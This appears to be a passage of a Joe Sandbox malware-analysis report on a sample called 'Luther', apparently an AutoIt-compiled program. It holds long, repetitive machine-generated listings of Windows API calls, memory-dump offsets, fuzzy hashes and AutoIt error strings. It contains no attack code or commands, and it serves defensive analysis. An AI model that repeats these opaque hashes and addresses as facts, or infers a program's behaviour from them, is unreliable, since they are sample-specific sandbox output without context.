                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E7194E
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E719D1
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E71B7B,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71A64
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71A7B
                                                                                                            • Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71AF7
                                                                                                          • __freea.LIBCMT ref: 00E71B22
                                                                                                          • __freea.LIBCMT ref: 00E71B2E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2829977744-0
                                                                                                          • Opcode ID: 9f3ffee20cda886a4d3f61f1d519a1843a09a3422613006a7cf325ffc74632a3
                                                                                                          • Instruction ID: b905e9738d00b3b627d54693997b372a68bbb40e56fb3202e9a899ce1496cef5
                                                                                                          • Opcode Fuzzy Hash: 9f3ffee20cda886a4d3f61f1d519a1843a09a3422613006a7cf325ffc74632a3
                                                                                                          • Instruction Fuzzy Hash: A891D372E00316AADB208EACCC51EEEBBB5DF49314F18A1A9E909F7180E725CC45C761
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 2610073882-625585964
                                                                                                          • Opcode ID: 88bfb843f40edd0473ea3fcd8f8a54f3d0c3f70357698e7115be3b062ba8ad6a
                                                                                                          • Instruction ID: 4d50ba279161430eb52fd0a503fd1bb6b272eb4885debccb84386bfde14847f7
                                                                                                          • Opcode Fuzzy Hash: 88bfb843f40edd0473ea3fcd8f8a54f3d0c3f70357698e7115be3b062ba8ad6a
                                                                                                          • Instruction Fuzzy Hash: D8918B72A01A19ABDF24CFA4CC48FEFBBB8AF45314F109569F515BB280D7709945CBA0
                                                                                                          APIs
                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00EA1C1B
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1C43
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00EA1C67
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1C97
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1D1E
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1D83
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1DEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                          • String ID:
                                                                                                          • API String ID: 2550207440-0
                                                                                                          • Opcode ID: c39261538b4fac87e60e56051efe896fd13089fac153312cd9fcc56ef839e04a
                                                                                                          • Instruction ID: 2322c450c8f74b480fc3d9624d2cd7825b085fbbec7bab139861a50f5632f275
                                                                                                          • Opcode Fuzzy Hash: c39261538b4fac87e60e56051efe896fd13089fac153312cd9fcc56ef839e04a
                                                                                                          • Instruction Fuzzy Hash: EA91EF71A002189FDB049FA4C884BBEB7F4FF0A726F14A0A9E951FB291D775B905CB50
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB43C8
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EB44D7
                                                                                                          • _wcslen.LIBCMT ref: 00EB44E7
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB467C
                                                                                                            • Part of subcall function 00EA169E: VariantInit.OLEAUT32(00000000), ref: 00EA16DE
                                                                                                            • Part of subcall function 00EA169E: VariantCopy.OLEAUT32(?,?), ref: 00EA16E7
                                                                                                            • Part of subcall function 00EA169E: VariantClear.OLEAUT32(?), ref: 00EA16F3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                          • Opcode ID: dae2c318dbade7e482ea4338519e7157249231dc819b98a8c163ed209b48d70b
                                                                                                          • Instruction ID: c74cc70bb3604efbe4f67bc68886fcce00c49e9061a3f713cdbae4799c58490c
                                                                                                          • Opcode Fuzzy Hash: dae2c318dbade7e482ea4338519e7157249231dc819b98a8c163ed209b48d70b
                                                                                                          • Instruction Fuzzy Hash: 7E916AB46083019FC714DF24C5849AABBE5FF89314F14992DF98AA7392DB31ED06CB42
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?,?,00E90C4E), ref: 00E9091B
                                                                                                            • Part of subcall function 00E908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90936
                                                                                                            • Part of subcall function 00E908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90944
                                                                                                            • Part of subcall function 00E908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?), ref: 00E90954
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EB56AE
                                                                                                          • _wcslen.LIBCMT ref: 00EB57B6
                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EB582C
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00EB5837
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 614568839-2785691316
                                                                                                          • Opcode ID: 585085d3fde6e7ffb3a0a82d19cd7ccd303038c9e2302c436b41cfad74cd7f23
                                                                                                          • Instruction ID: 070365cf3be94f78301c574f9aa3b65b5c3a71043b540c9342b9ba4227c2307b
                                                                                                          • Opcode Fuzzy Hash: 585085d3fde6e7ffb3a0a82d19cd7ccd303038c9e2302c436b41cfad74cd7f23
                                                                                                          • Instruction Fuzzy Hash: BF91F472D00219EFDF14DFA4DC81AEEBBB8AF08304F10556AE915B7251DB719A45CFA0
                                                                                                          APIs
                                                                                                          • GetMenu.USER32(?), ref: 00EC2C1F
                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00EC2C51
                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EC2C79
                                                                                                          • _wcslen.LIBCMT ref: 00EC2CAF
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00EC2CE9
                                                                                                          • GetSubMenu.USER32(?,?), ref: 00EC2CF7
                                                                                                            • Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
                                                                                                            • Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
                                                                                                            • Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB
                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC2D7F
                                                                                                            • Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4196846111-0
                                                                                                          • Opcode ID: bfaf4f9bafb326ce5fa0a5bd684ef65a700ee70f2638111b422e3ab2bd3e726a
                                                                                                          • Instruction ID: f94cc8b1fa5d3fdb49d8c9a2236038dfcf771e8062a3d7c2929dd5ffa219dd4b
                                                                                                          • Opcode Fuzzy Hash: bfaf4f9bafb326ce5fa0a5bd684ef65a700ee70f2638111b422e3ab2bd3e726a
                                                                                                          • Instruction Fuzzy Hash: B4716975A00205AFCB14EF64C945FAEBBF1AF48314F10986DE916BB351DB36A942CB90
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00000000), ref: 00EC8992
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00EC899E
                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EC8A79
                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00EC8AAC
                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 00EC8AE4
                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00EC8B06
                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EC8B1E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                          • String ID:
                                                                                                          • API String ID: 4072528602-0
                                                                                                          • Opcode ID: 52914062a36b0e4c7c45eb92449969eaddbfc820200c2e4859aed1e643793621
                                                                                                          • Instruction ID: 5cc2be598a76c821bac74d68b406fc97d4e264f3d770df87868db26ffac60479
                                                                                                          • Opcode Fuzzy Hash: 52914062a36b0e4c7c45eb92449969eaddbfc820200c2e4859aed1e643793621
                                                                                                          • Instruction Fuzzy Hash: 4D718B74604204AFDB21DF55CB84FBABBB5EF49304F14246EE84577261CB32AD86DB11
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 00E9B8C0
                                                                                                          • GetKeyboardState.USER32(?), ref: 00E9B8D5
                                                                                                          • SetKeyboardState.USER32(?), ref: 00E9B936
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E9B964
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E9B983
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E9B9C4
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E9B9E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: d352ccef694acbac1f41ddd8a47d2219d71251b218f3898ff035b93af9ae9fb0
                                                                                                          • Instruction ID: 67dfce0148155073a367fd3e9451254b5f3b9068601a9f254dfd692ed7d24ffe
                                                                                                          • Opcode Fuzzy Hash: d352ccef694acbac1f41ddd8a47d2219d71251b218f3898ff035b93af9ae9fb0
                                                                                                          • Instruction Fuzzy Hash: 425122A06187D53EFF364234DD45BBABEA95F46308F089489E1D9A58D2C3D8ECC8D750
                                                                                                          APIs
                                                                                                          • GetParent.USER32(00000000), ref: 00E9B6E0
                                                                                                          • GetKeyboardState.USER32(?), ref: 00E9B6F5
                                                                                                          • SetKeyboardState.USER32(?), ref: 00E9B756
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E9B782
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E9B79F
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9B7DE
                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9B7FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: e9e174caf526b5a6c68931f9a8b40c989a28cfa0fba3942070991c4f5be400fb
                                                                                                          • Instruction ID: e9a2c903f8fc9d60ec210a4e8bcbe4b29001450a4318b7f11f5c81f5094652ee
                                                                                                          • Opcode Fuzzy Hash: e9e174caf526b5a6c68931f9a8b40c989a28cfa0fba3942070991c4f5be400fb
                                                                                                          • Instruction Fuzzy Hash: A95136A09083D53DFF368374DD55BBABEA95F45308F0C968AE0D46A8C2D394EC88D750
                                                                                                          APIs
                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00E65F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00E657E3
                                                                                                          • __fassign.LIBCMT ref: 00E6585E
                                                                                                          • __fassign.LIBCMT ref: 00E65879
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00E6589F
                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00E65F16,00000000,?,?,?,?,?,?,?,?,?,00E65F16,?), ref: 00E658BE
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00E65F16,00000000,?,?,?,?,?,?,?,?,?,00E65F16,?), ref: 00E658F7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1324828854-0
                                                                                                          • Opcode ID: ae832f3b9ca0e6ddc6b41063efce62b7f93d8163b3085392aa6d0ac866540b6f
                                                                                                          • Instruction ID: 9609b4ac4e0efe716675c86d90dcea1d75910cfbd901e8c97a6d7e4cf07808a4
                                                                                                          • Opcode Fuzzy Hash: ae832f3b9ca0e6ddc6b41063efce62b7f93d8163b3085392aa6d0ac866540b6f
                                                                                                          • Instruction Fuzzy Hash: 0C51CE72A406499FCB10CFA8EC85AEEBBF8FF49350F14412AE951F7291D7309A41CB60
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00E319E1
                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00E319FE
                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00E31A23
                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00E31A3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                          • String ID: $'
                                                                                                          • API String ID: 4210589936-3149202309
                                                                                                          • Opcode ID: 87ded62d213d2c204c545987b66721a0a4c68e14f8c2704594dff31e59bace5a
                                                                                                          • Instruction ID: 80c1f5b83993ca78701717fa23703b88af735fc6d1b1293018f665a8dd8b03cb
                                                                                                          • Opcode Fuzzy Hash: 87ded62d213d2c204c545987b66721a0a4c68e14f8c2704594dff31e59bace5a
                                                                                                          • Instruction Fuzzy Hash: 9F419E71A0520AFFDF15DF64C848BEEBBB4FB05325F20926AE429B2290C7316A54DB51
                                                                                                          APIs
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00E530BB
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00E530C3
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00E53151
                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00E5317C
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00E531D1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                          • Opcode ID: 4285e9fcf1cc72bbe6ae82dab7ca9877a8f8090dcbdce2e1ba0cc20016df893e
                                                                                                          • Instruction ID: 04fc2050083b2f1af985b4a89bf77d2688d2d7bf4eab2b734e20ca88f1c9e9c6
                                                                                                          • Opcode Fuzzy Hash: 4285e9fcf1cc72bbe6ae82dab7ca9877a8f8090dcbdce2e1ba0cc20016df893e
                                                                                                          • Instruction Fuzzy Hash: 2441B534A012089BCF10DF78C881AAEBBB5AF45399F149955EC157B392D731DB09CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9D7CD,?), ref: 00E9E714
                                                                                                            • Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9D7CD,?), ref: 00E9E72D
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E9D7F0
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00E9D82A
                                                                                                          • _wcslen.LIBCMT ref: 00E9D8B0
                                                                                                          • _wcslen.LIBCMT ref: 00E9D8C6
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 00E9D90C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                          • Opcode ID: eb02f70a18e8db81e5f4dc0c38d0fd756da2e867841d3c93acddc645013a1720
                                                                                                          • Instruction ID: 0cb754acf5d6f5f921cd8342f4bf4d55d333f1808b74ee185c769019e83ca0ac
                                                                                                          • Opcode Fuzzy Hash: eb02f70a18e8db81e5f4dc0c38d0fd756da2e867841d3c93acddc645013a1720
                                                                                                          • Instruction Fuzzy Hash: F34167719052289EDF16EFA4CD85EDD77F8AF08380F1014EAA605FB152EB75A788CB50
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EC38B8
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC38EB
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC3920
                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EC3952
                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EC397C
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC398D
